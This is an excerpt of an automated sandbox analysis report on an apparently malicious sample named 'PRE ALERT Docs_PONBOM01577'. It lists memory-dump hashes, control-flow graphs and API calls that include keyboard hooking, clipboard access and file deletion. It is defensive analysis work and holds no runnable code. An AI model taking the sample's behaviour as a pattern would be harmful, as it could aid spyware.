                        • Instruction ID: a14daab7d566238c3a74b7b95787b007ca73fd7fce2ccee4a20ff92dc2e748c0
                        • Opcode Fuzzy Hash: a081ef347dd3807fde001a3ba710cc68dbdd92c0b4734fe5bc4d530d3c7426db
                        • Instruction Fuzzy Hash: 45E1FB74E1011A8FCB14DFA9D5809AEFBF2FF89304F248169E415AB35AD731A941CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1643286788.0000000001360000.00000040.00000800.00020000.00000000.sdmp, Offset: 01360000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_1360000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f2a60c6fd81fc89eb47aca762ddce58213fae4c414eb0a9d9fcbe2dbc0c18cad
                        • Instruction ID: ea5d8476f95d9a7d92433e28de575612bd649297319d2a830e6a342e040ce169
                        • Opcode Fuzzy Hash: f2a60c6fd81fc89eb47aca762ddce58213fae4c414eb0a9d9fcbe2dbc0c18cad
                        • Instruction Fuzzy Hash: F0A1A232E10216CFCF05DFB8D8545DEBBBAFF85304B14856AE901AB269DB71E915CB40
                        Memory Dump Source
                        • Source File: 00000000.00000002.1646324139.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_5350000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0f9319f37a9e06ffd83430b16291d86122b954765d8205b985107c8d12aec2fd
                        • Instruction ID: 7dc81ec558e5da9d64b5a956509e07e2a2e1b28b1eef11e998f4e3726d0f04de
                        • Opcode Fuzzy Hash: 0f9319f37a9e06ffd83430b16291d86122b954765d8205b985107c8d12aec2fd
                        • Instruction Fuzzy Hash: 6DC13BB1621B869BEB10CF25F84E18A7FB2BF45324F514209E1616B6E5DFB8144ACF44
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 068bd153ed3efcf63aa228a9a5c412d5c22a22d2d61df825b4f9ce161a8b971c
                        • Instruction ID: 5475746cb4370f491a4b70d74665ff83d360061f4547ffc4e4f62cf316102be3
                        • Opcode Fuzzy Hash: 068bd153ed3efcf63aa228a9a5c412d5c22a22d2d61df825b4f9ce161a8b971c
                        • Instruction Fuzzy Hash: 11513E75E1421A8FDB14DFA9C9805AEFBF2BF89304F14C1AAD418A7356D730A941CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5f736d3334a9ab8796c0059f0020b294c535acfa4ff023162548f3e4f71e89e9
                        • Instruction ID: 8ea6781c129ae1a9238a705e0f3b44661141593b81d589dc0ba1a7cf54048792
                        • Opcode Fuzzy Hash: 5f736d3334a9ab8796c0059f0020b294c535acfa4ff023162548f3e4f71e89e9
                        • Instruction Fuzzy Hash: 7E511B75E1521A8FCB14DFA9D5805AEFBF2BF89304F24C16AD418A7316D730A941CFA1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1645945112.0000000004DD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DD0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4dd0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: dd4bc4e48f03bb732e38724ee6cac0461b73b104a7dd98b243ca0b71f5a3335d
                        • Instruction ID: 75e8d64c618d55308b43976d0d9de41e9d466ddae884498a8035310567cab04e
                        • Opcode Fuzzy Hash: dd4bc4e48f03bb732e38724ee6cac0461b73b104a7dd98b243ca0b71f5a3335d
                        • Instruction Fuzzy Hash: D7513AB4E1421A8FCB14DFA9D5405AEFBF2BF89300F24C16AD418A7316D731A941CFA0

                        Execution Graph

                        Execution Coverage:11.3%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:163
                        Total number of Limit Nodes:17
                        execution_graph 39039 2c08060 39041 2c080a6 DeleteFileW 39039->39041 39042 2c080df 39041->39042 39043 132d030 39044 132d048 39043->39044 39046 132d0a2 39044->39046 39051 69c1b9c 39044->39051 39059 69c34a3 39044->39059 39064 69c7952 39044->39064 39073 69c3440 39044->39073 39077 69c3450 39044->39077 39052 69c1ba7 39051->39052 39053 69c79e1 39052->39053 39055 69c79d1 39052->39055 39089 69c6adc 39053->39089 39081 69c7af8 39055->39081 39085 69c7b08 39055->39085 39056 69c79df 39060 69c34aa 39059->39060 39061 69c3474 39059->39061 39060->39046 39062 69c1b9c CallWindowProcW 39061->39062 39063 69c3497 39062->39063 39063->39046 39065 69c795a 39064->39065 39066 69c796a 39064->39066 39065->39046 39067 69c79e1 39066->39067 39070 69c79d1 39066->39070 39068 69c6adc CallWindowProcW 39067->39068 39069 69c79df 39068->39069 39071 69c7af8 CallWindowProcW 39070->39071 39072 69c7b08 CallWindowProcW 39070->39072 39071->39069 39072->39069 39074 69c3476 39073->39074 39075 69c1b9c CallWindowProcW 39074->39075 39076 69c3497 39075->39076 39076->39046 39078 69c3476 39077->39078 39079 69c1b9c CallWindowProcW 39078->39079 39080 69c3497 39079->39080 39080->39046 39083 69c7b08 39081->39083 39082 69c6adc CallWindowProcW 39082->39083 39083->39082 39084 69c7bee 39083->39084 39084->39056 39086 69c7b16 39085->39086 39087 69c6adc CallWindowProcW 39086->39087 39088 69c7bee 39086->39088 39087->39086 39088->39056 39090 69c6ae7 39089->39090 39091 69c7ca2 CallWindowProcW 39090->39091 39092 69c7c51 39090->39092 39091->39092 39092->39056 39093 69c3298 39094 69c3300 CreateWindowExW 39093->39094 39096 69c33bc 39094->39096 39096->39096 39097 69c87b8 39098 69c87c3 39097->39098 39099 69c87d3 39098->39099 39101 69c7fb4 39098->39101 39102 69c8808 OleInitialize 39101->39102 39103 69c886c 39102->39103 39103->39099 39231 69c6b28 39232 69c6b29 GetCurrentProcess 39231->39232 39234 69c6bb9 39232->39234 39235 69c6bc0 GetCurrentThread 39232->39235 39234->39235 39236 69c6bfd GetCurrentProcess 39235->39236 39237 69c6bf6 39235->39237 39238 69c6c33 39236->39238 39237->39236 39239 69c6c5b GetCurrentThreadId 39238->39239 39240 69c6c8c 39239->39240 39104 2c00848 39106 2c0084e 39104->39106 39105 2c0091b 39106->39105 39108 2c0134f 39106->39108 39110 2c0131c 39108->39110 39109 2c0147a 39109->39106 39110->39109 39116 2c08110 39110->39116 39120 2c08120 39110->39120 39124 69c0202 39110->39124 39132 69c0210 39110->39132 39140 2c08819 39110->39140 39117 2c0813f 39116->39117 39119 2c081fa 39117->39119 39145 2c07808 39117->39145 39119->39110 39122 2c0813f 39120->39122 39121 2c081fa 39121->39110 39122->39121 39123 2c07808 MoveFileA 39122->39123 39123->39121 39125 69c0222 39124->39125 39127 69c02d3 39125->39127 39149 69c0838 39125->39149 39154 69c0858 39125->39154 39127->39110 39133 69c0222 39132->39133 39135 69c02d3 39133->39135 39136 69c0838 GetModuleHandleW 39133->39136 39137 69c0858 GetModuleHandleW 39133->39137 39134 69c0299 39138 69c82f0 KiUserCallbackDispatcher 39134->39138 39139 69c8300 KiUserCallbackDispatcher 39134->39139 39135->39110 39136->39134 39137->39134 39138->39135 39139->39135 39142 2c08823 39140->39142 39141 2c088d9 39141->39110 39142->39141 39208 6a1f4e0 39142->39208 39213 6a1f4d0 39142->39213 39146 2c08630 MoveFileA 39145->39146 39148 2c086cf 39146->39148 39148->39119 39150 69c083d 39149->39150 39167 69c13bb 39150->39167 39173 69c13d0 39150->39173 39155 69c0865 39154->39155 39157 69c13bb GetModuleHandleW 39155->39157 39158 69c13d0 GetModuleHandleW 39155->39158 39156 69c0299 39159 69c82f0 39156->39159 39163 69c8300 39156->39163 39157->39156 39158->39156 39160 69c8300 39159->39160 39162 69c832b 39160->39162 39204 69c7d7c 39160->39204 39162->39127 39165 69c8308 39163->39165 39164 69c7d7c KiUserCallbackDispatcher 39164->39165 39165->39164 39166 69c832b 39165->39166 39166->39127 39168 69c13d0 39167->39168 39179 69c1931 39168->39179 39169 69c147e 39170 69c0804 GetModuleHandleW 39169->39170 39171 69c14aa 39169->39171 39170->39171 39174 69c13fb 39173->39174 39178 69c1931 GetModuleHandleW 39174->39178 39175 69c147e 39176 69c0804 GetModuleHandleW 39175->39176 39177 69c14aa 39175->39177 39176->39177 39178->39175 39180 69c196d 39179->39180 39181 69c19ee 39180->39181 39184 69c1fa6 39180->39184 39192 69c1f17 39180->39192 39185 69c1fde 39184->39185 39200 69c0804 39185->39200 39187 69c2042 39188 69c0804 GetModuleHandleW 39187->39188 39191 69c20bc 39187->39191 39189 69c2090 39188->39189 39190 69c0804 GetModuleHandleW 39189->39190 39189->39191 39190->39191 39191->39181 39193 69c1f22 39192->39193 39194 69c0804 GetModuleHandleW 39193->39194 39195 69c2042 39194->39195 39196 69c0804 GetModuleHandleW 39195->39196 39199 69c20bc 39195->39199 39197 69c2090 39196->39197 39198 69c0804 GetModuleHandleW 39197->39198 39197->39199 39198->39199 39199->39181 39201 69c21f0 GetModuleHandleW 39200->39201 39203 69c2265 39201->39203 39203->39187 39205 69c8340 KiUserCallbackDispatcher 39204->39205 39207 69c83ae 39205->39207 39207->39160 39210 6a1f4f5 39208->39210 39209 6a1f70a 39209->39141 39210->39209 39211 6a1f720 GlobalMemoryStatusEx GlobalMemoryStatusEx 39210->39211 39212 6a1f97c GlobalMemoryStatusEx GlobalMemoryStatusEx 39210->39212 39211->39210 39212->39210 39215 6a1f4f5 39213->39215 39214 6a1f70a 39214->39141 39215->39214 39216 6a1f720 GlobalMemoryStatusEx GlobalMemoryStatusEx 39215->39216 39217 6a1f97c GlobalMemoryStatusEx GlobalMemoryStatusEx 39215->39217 39216->39215 39217->39215 39218 69ca710 39219 69ca754 SetWindowsHookExA 39218->39219 39221 69ca79a 39219->39221 39222 69c8950 39223 69c89aa OleGetClipboard 39222->39223 39224 69c89ea 39223->39224 39225 69c6d70 DuplicateHandle 39226 69c6e06 39225->39226 39227 69c21d3 39228 69c21f0 GetModuleHandleW 39227->39228 39230 69c2265 39228->39230

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 125 6a13018-6a13039 126 6a1303b-6a1303e 125->126 127 6a13040-6a1305f 126->127 128 6a13064-6a13067 126->128 127->128 129 6a13808-6a1380a 128->129 130 6a1306d-6a1308c 128->130 131 6a13811-6a13814 129->131 132 6a1380c 129->132 138 6a130a5-6a130af 130->138 139 6a1308e-6a13091 130->139 131->126 135 6a1381a-6a13823 131->135 132->131 143 6a130b5-6a130c4 138->143 139->138 140 6a13093-6a130a3 139->140 140->143 251 6a130c6 call 6a13831 143->251 252 6a130c6 call 6a13838 143->252 144 6a130cb-6a130d0 145 6a130d2-6a130d8 144->145 146 6a130dd-6a133ba 144->146 145->135 167 6a133c0-6a1346f 146->167 168 6a137fa-6a13807 146->168 177 6a13471-6a13496 167->177 178 6a13498 167->178 180 6a134a1-6a134b4 177->180 178->180 182 6a137e1-6a137ed 180->182 183 6a134ba-6a134dc 180->183 182->167 184 6a137f3 182->184 183->182 186 6a134e2-6a134ec 183->186 184->168 186->182 187 6a134f2-6a134fd 186->187 187->182 188 6a13503-6a135d9 187->188 200 6a135e7-6a13617 188->200 201 6a135db-6a135dd 188->201 205 6a13625-6a13631 200->205 206 6a13619-6a1361b 200->206 201->200 207 6a13691-6a13695 205->207 208 6a13633-6a13637 205->208 206->205 209 6a137d2-6a137db 207->209 210 6a1369b-6a136d7 207->210 208->207 211 6a13639-6a13663 208->211 209->182 209->188 221 6a136e5-6a136f3 210->221 222 6a136d9-6a136db 210->222 218 6a13671-6a1368e 211->218 219 6a13665-6a13667 211->219 218->207 219->218 225 6a136f5-6a13700 221->225 226 6a1370a-6a13715 221->226 222->221 225->226 229 6a13702 225->229 230 6a13717-6a1371d 226->230 231 6a1372d-6a1373e 226->231 229->226 232 6a13721-6a13723 230->232 233 6a1371f 230->233 235 6a13740-6a13746 231->235 236 6a13756-6a13762 231->236 232->231 233->231 237 6a13748 235->237 238 6a1374a-6a1374c 235->238 240 6a13764-6a1376a 236->240 241 6a1377a-6a137cb 236->241 237->236 238->236 242 6a1376c 240->242 243 6a1376e-6a13770 240->243 241->209 242->241 243->241 251->144 252->144
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-2392861976
                        • Opcode ID: 3f31105b65561770ad193be3c747ffc23a67698d54fd1f8a0e62a9d14d31de55
                        • Instruction ID: 82728fa281e91735c397981cdf86154d7f975ae695d313c655894eb89005984a
                        • Opcode Fuzzy Hash: 3f31105b65561770ad193be3c747ffc23a67698d54fd1f8a0e62a9d14d31de55
                        • Instruction Fuzzy Hash: C2322031E1061ACFDB54EF75C9945ADB7B6FF89300F10C6AAD409AB254EB30A985CB81

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 674 6a178f8-6a17916 675 6a17918-6a1791b 674->675 676 6a1791d-6a17939 675->676 677 6a1793e-6a17941 675->677 676->677 680 6a17943-6a1794d 677->680 681 6a1794e-6a17951 677->681 682 6a17953-6a17961 681->682 683 6a17968-6a1796b 681->683 691 6a1799e-6a179b4 682->691 692 6a17963 682->692 685 6a1796d-6a17987 683->685 686 6a1798c-6a1798e 683->686 685->686 687 6a17990 686->687 688 6a17995-6a17998 686->688 687->688 688->675 688->691 695 6a179ba-6a179c3 691->695 696 6a17bcf-6a17bd9 691->696 692->683 697 6a179c9-6a179e6 695->697 698 6a17bda-6a17c0f 695->698 707 6a17bbc-6a17bc9 697->707 708 6a179ec-6a17a14 697->708 701 6a17c11-6a17c14 698->701 702 6a17cc1-6a17cc4 701->702 703 6a17c1a-6a17c26 701->703 705 6a17ce7-6a17cea 702->705 706 6a17cc6-6a17ce2 702->706 709 6a17c31-6a17c33 703->709 710 6a17cf0-6a17cff 705->710 711 6a17f1f-6a17f21 705->711 706->705 707->695 707->696 708->707 729 6a17a1a-6a17a23 708->729 713 6a17c35-6a17c3b 709->713 714 6a17c4b-6a17c4f 709->714 724 6a17d01-6a17d1c 710->724 725 6a17d1e-6a17d62 710->725 715 6a17f23 711->715 716 6a17f28-6a17f2b 711->716 719 6a17c3d 713->719 720 6a17c3f-6a17c41 713->720 722 6a17c51-6a17c5b 714->722 723 6a17c5d 714->723 715->716 716->701 721 6a17f31-6a17f3a 716->721 719->714 720->714 727 6a17c62-6a17c64 722->727 723->727 724->725 736 6a17ef3-6a17f09 725->736 737 6a17d68-6a17d79 725->737 730 6a17c66-6a17c69 727->730 731 6a17c7b-6a17cb4 727->731 729->698 733 6a17a29-6a17a45 729->733 730->721 731->710 755 6a17cb6-6a17cc0 731->755 742 6a17a4b-6a17a75 733->742 743 6a17baa-6a17bb6 733->743 736->711 746 6a17d7f-6a17d9c 737->746 747 6a17ede-6a17eed 737->747 758 6a17ba0-6a17ba5 742->758 759 6a17a7b-6a17aa3 742->759 743->707 743->729 746->747 756 6a17da2-6a17e98 call 6a16110 746->756 747->736 747->737 808 6a17ea6 756->808 809 6a17e9a-6a17ea4 756->809 758->743 759->758 765 6a17aa9-6a17ad7 759->765 765->758 771 6a17add-6a17ae6 765->771 771->758 772 6a17aec-6a17b1e 771->772 780 6a17b20-6a17b24 772->780 781 6a17b29-6a17b45 772->781 780->758 782 6a17b26 780->782 781->743 783 6a17b47-6a17b9e call 6a16110 781->783 782->781 783->743 810 6a17eab-6a17ead 808->810 809->810 810->747 811 6a17eaf-6a17eb4 810->811 812 6a17ec2 811->812 813 6a17eb6-6a17ec0 811->813 814 6a17ec7-6a17ec9 812->814 813->814 814->747 815 6a17ecb-6a17ed7 814->815 815->747
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q
                        • API String ID: 0-355816377
                        • Opcode ID: 4b42a6f3c505f439d90a2d8a1e834508b97194e563f364706429f8754c57d269
                        • Instruction ID: 8fea8b271e62bdb5ff2ab703653a7b52d1a65b4db6c43ba54656b65a4e93a57b
                        • Opcode Fuzzy Hash: 4b42a6f3c505f439d90a2d8a1e834508b97194e563f364706429f8754c57d269
                        • Instruction Fuzzy Hash: 76028C30B002168FDB54EF69D590AAEB7E2FF84304F248529D41A9F395DB31ED46CB91
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: be8cf7df8d38370968c73cb6efafdb9de8efd7c489a5d26659445e3a5e437ae9
                        • Instruction ID: 9258278966103d75131b016cd31c47366e2aa7a355c757ad040facaf0549ae8b
                        • Opcode Fuzzy Hash: be8cf7df8d38370968c73cb6efafdb9de8efd7c489a5d26659445e3a5e437ae9
                        • Instruction Fuzzy Hash: 59924634A002048FDB64EB68C584B9DB7F2FF45314F5484A9D45AAF365DB35EE86CB80
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d37792c1574d8ccd8ba057015f29b46e71403db3a32e069874876583a11becdf
                        • Instruction ID: 79e241f9c380f51b45fabca7c1ab649a27e9ac012e1f5df42398d589d58574e2
                        • Opcode Fuzzy Hash: d37792c1574d8ccd8ba057015f29b46e71403db3a32e069874876583a11becdf
                        • Instruction Fuzzy Hash: 0462AE30B002188FDB54EB68D594AADB7F2EF88314F149569E806EF395DB35ED42CB80
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 309a55ba573815fd0aa827cd52ffc2d31cb555d378db30f3e9ac0ace4022c74e
                        • Instruction ID: 027f63d86954cd5b3a0f3f953b1dc637f288ad249d3f9cab5020ff83c92fb3c4
                        • Opcode Fuzzy Hash: 309a55ba573815fd0aa827cd52ffc2d31cb555d378db30f3e9ac0ace4022c74e
                        • Instruction Fuzzy Hash: 2F329F35B40209DFDB54EB68D990BAEB7B2EB88324F108529D406EF355DB39DC428B91
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 126bae3324fc009837f665c6f3171eb7522b84cd885a7a7c6921cac9194b6fde
                        • Instruction ID: 82c889afb39ba86e95e4ea3c06a48b2535c9a8d566ae6e816312c05b6113d37d
                        • Opcode Fuzzy Hash: 126bae3324fc009837f665c6f3171eb7522b84cd885a7a7c6921cac9194b6fde
                        • Instruction Fuzzy Hash: 5812F271F002159FDB65AF68C8907AEB7B6EF85310F20846AD84ADF381DA34DC46CB91
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: ebb5e3ee774e65bbca3327dd49f86ef7425f0e739990c823a2fb23c1cb1293a4
                        • Instruction ID: 48ffb2b97d874ccf0eca445692a09c4483865dfd9fdc30919c74ab6a45bb161d
                        • Opcode Fuzzy Hash: ebb5e3ee774e65bbca3327dd49f86ef7425f0e739990c823a2fb23c1cb1293a4
                        • Instruction Fuzzy Hash: AB227130E112098FDF64EB68D5907AEB7B6FB49310F208926E459DF391DA35DC82CB61

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 6a1a838-6a1a856 1 6a1a858-6a1a85b 0->1 2 6a1a86b-6a1a86e 1->2 3 6a1a85d-6a1a866 1->3 4 6a1a891-6a1a894 2->4 5 6a1a870-6a1a88c 2->5 3->2 6 6a1a896-6a1a8a9 4->6 7 6a1a8ae-6a1a8b1 4->7 5->4 6->7 8 6a1a8b3-6a1a8c0 7->8 9 6a1a8c5-6a1a8c8 7->9 8->9 12 6a1a8d2-6a1a8d5 9->12 13 6a1a8ca-6a1a8cf 9->13 15 6a1a8d7-6a1a8e0 12->15 16 6a1a8ef-6a1a8f2 12->16 13->12 18 6a1a8e6-6a1a8ea 15->18 19 6a1aa6f-6a1aaa6 15->19 20 6a1aa55-6a1aa5e 16->20 21 6a1a8f8-6a1a8fb 16->21 18->16 30 6a1aaa8-6a1aaab 19->30 20->15 22 6a1aa64-6a1aa6e 20->22 23 6a1a8fd-6a1a901 21->23 24 6a1a90c-6a1a90e 21->24 23->22 25 6a1a907 23->25 26 6a1a910 24->26 27 6a1a915-6a1a918 24->27 25->24 26->27 27->1 29 6a1a91e-6a1a942 27->29 44 6a1aa52 29->44 45 6a1a948-6a1a957 29->45 31 6a1aab8-6a1aabb 30->31 32 6a1aaad-6a1aab1 30->32 33 6a1aabd-6a1aad9 31->33 34 6a1aade-6a1aae1 31->34 36 6a1aab3 32->36 37 6a1aae7-6a1ab22 32->37 33->34 34->37 38 6a1ad4a-6a1ad4d 34->38 36->31 46 6a1ad15-6a1ad28 37->46 47 6a1ab28-6a1ab34 37->47 42 6a1ad5a-6a1ad5d 38->42 43 6a1ad4f-6a1ad59 38->43 48 6a1ad6c-6a1ad6e 42->48 49 6a1ad5f call 6a1ad90 42->49 44->20 59 6a1a959-6a1a95f 45->59 60 6a1a96f-6a1a9aa call 6a16110 45->60 52 6a1ad2a 46->52 61 6a1ab54-6a1ab98 47->61 62 6a1ab36-6a1ab4f 47->62 50 6a1ad70 48->50 51 6a1ad75-6a1ad78 48->51 57 6a1ad65-6a1ad67 49->57 50->51 51->30 54 6a1ad7e-6a1ad88 51->54 58 6a1ad2b 52->58 57->48 58->58 63 6a1a961 59->63 64 6a1a963-6a1a965 59->64 78 6a1a9c2-6a1a9d9 60->78 79 6a1a9ac-6a1a9b2 60->79 76 6a1abb4-6a1abf3 61->76 77 6a1ab9a-6a1abac 61->77 62->52 63->60 64->60 85 6a1abf9-6a1acd4 call 6a16110 76->85 86 6a1acda-6a1acef 76->86 77->76 90 6a1a9f1-6a1aa02 78->90 91 6a1a9db-6a1a9e1 78->91 80 6a1a9b4 79->80 81 6a1a9b6-6a1a9b8 79->81 80->78 81->78 85->86 86->46 98 6a1aa04-6a1aa0a 90->98 99 6a1aa1a-6a1aa4b 90->99 93 6a1a9e3 91->93 94 6a1a9e5-6a1a9e7 91->94 93->90 94->90 101 6a1aa0c 98->101 102 6a1aa0e-6a1aa10 98->102 99->44 101->99 102->99
                        Strings
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116809373.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_6a10000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-3823777903
                        • Opcode ID: 49461007392ae33b575f629966ac8a217c1f76c61968a96d3e8f485a0736c2a6
                        • Instruction ID: 95e86585b4d11d06d1b59ced055ef9ac8a14360c35108b128cb6920f1a467d54
                        • Opcode Fuzzy Hash: 49461007392ae33b575f629966ac8a217c1f76c61968a96d3e8f485a0736c2a6
                        • Instruction Fuzzy Hash: A3E16D30F1120A8FDB65EF69D9906AEB7B2FF85304F208529D50AAF355DB31D846CB81

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 253 69c6b19-69c6b20 254 69c6b29-69c6bb7 GetCurrentProcess 253->254 255 69c6b22-69c6b28 253->255 260 69c6bb9-69c6bbf 254->260 261 69c6bc0-69c6bf4 GetCurrentThread 254->261 255->254 260->261 262 69c6bfd-69c6c31 GetCurrentProcess 261->262 263 69c6bf6-69c6bfc 261->263 264 69c6c3a-69c6c55 call 69c6cf8 262->264 265 69c6c33-69c6c39 262->265 263->262 269 69c6c5b-69c6c8a GetCurrentThreadId 264->269 265->264 270 69c6c8c-69c6c92 269->270 271 69c6c93-69c6cf5 269->271 270->271
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 069C6BA6
                        • GetCurrentThread.KERNEL32 ref: 069C6BE3
                        • GetCurrentProcess.KERNEL32 ref: 069C6C20
                        • GetCurrentThreadId.KERNEL32 ref: 069C6C79
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: 8ecdc9cd0ce7062ab721deb2b8078420a2838bc9915b28e704b49d3ff2dcf2e8
                        • Instruction ID: a3d461ac03396274dfc6f43c523d5c1237f0568e9068223eb62510f2b19d4ac2
                        • Opcode Fuzzy Hash: 8ecdc9cd0ce7062ab721deb2b8078420a2838bc9915b28e704b49d3ff2dcf2e8
                        • Instruction Fuzzy Hash: F65176B0900309CFCB44DFAAD948BDEBBF1EB48314F208059E009A7360D735A984CB66

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 278 69c6b28-69c6bb7 GetCurrentProcess 283 69c6bb9-69c6bbf 278->283 284 69c6bc0-69c6bf4 GetCurrentThread 278->284 283->284 285 69c6bfd-69c6c31 GetCurrentProcess 284->285 286 69c6bf6-69c6bfc 284->286 287 69c6c3a-69c6c55 call 69c6cf8 285->287 288 69c6c33-69c6c39 285->288 286->285 292 69c6c5b-69c6c8a GetCurrentThreadId 287->292 288->287 293 69c6c8c-69c6c92 292->293 294 69c6c93-69c6cf5 292->294 293->294
                        APIs
                        • GetCurrentProcess.KERNEL32 ref: 069C6BA6
                        • GetCurrentThread.KERNEL32 ref: 069C6BE3
                        • GetCurrentProcess.KERNEL32 ref: 069C6C20
                        • GetCurrentThreadId.KERNEL32 ref: 069C6C79
                        Memory Dump Source
                        • Source File: 00000002.00000002.4116338815.00000000069C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 069C0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_2_2_69c0000_PRE ALERT Docs_PONBOM01577.jbxd
                        Similarity
                        • API ID: Current$ProcessThread
                        • String ID:
                        • API String ID: 2063062207-0
                        • Opcode ID: dd7dda14ab0960983566538e75c60af3f9a3577c6927538ee453456db878eedc
                        • Instruction ID: 8332857d289477751007290b574a68426b783f936f66618cce26eef61a1d9daf
                        • Opcode Fuzzy Hash: dd7dda14ab0960983566538e75c60af3f9a3577c6927538ee453456db878eedc
                        • Instruction Fuzzy Hash: 505145B0900309CFDB54DFAAD948B9EBBF1EB48314F208469E01AA7760D775A944CB66

                        Control-flow Graph

                        • Executed
                        • Not Executed
